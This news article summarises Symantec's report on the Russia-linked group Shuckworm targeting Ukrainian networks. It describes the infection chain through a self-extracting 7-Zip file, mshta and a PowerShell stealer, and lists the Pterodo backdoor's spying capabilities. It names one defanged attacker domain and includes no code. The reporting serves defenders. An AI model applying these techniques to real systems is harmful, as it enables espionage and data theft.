- Recent Shuckworm activity is aimed at Ukraine to deliver information-stealing malware to targeted networks.
- The first suspicious activity on victim systems was a self-extracting 7-Zip file, which was downloaded via the browser.
- The legitimate remote desktop protocol tools, Ammyy Admin and AnyDesk were both also leveraged by the attackers for remote access.
Symantec, a division of Broadcom Software announced that they have observed a Russia-linked group, Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa, is still using information-stealing malware to target Ukrainian networks. The company stated that the group’s one recent attack was on the 8th of August and the campaign is consistent with the ones that were pinpointed in a report by the Computer Emergency Response Team of Ukraine.
Infection vector
Symantec saw a self-extracting 7-Zip file on victims’ systems. Subsequently, mshta.exe downloaded an XML file, which was likely masquerading as an HTA file. Files were downloaded from a0698649[.]xsph[.]ru, which is associated with Shuckworm activity.
Once the XML file is downloaded, it executes a PowerShell stealer, which has three versions that can appear on one system. Multiple versions can work simultaneously to avoid detection. Symantec also announced that they found backdoors named Pterodo, a Shuckworm tool. These backdoors can call PowerShell, upload screenshots, and execute the code coming from a command-and-control server. The backdoor had the file name 4896.exe. This backdoor had multiple capabilities, including:
- Record audio using the microphone and upload the recorded files to a remote location
- Take screenshots and upload them
- Log and upload keystrokes
- Download and execute .exe files or download and load DLL files
Symantec said,
« As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations. »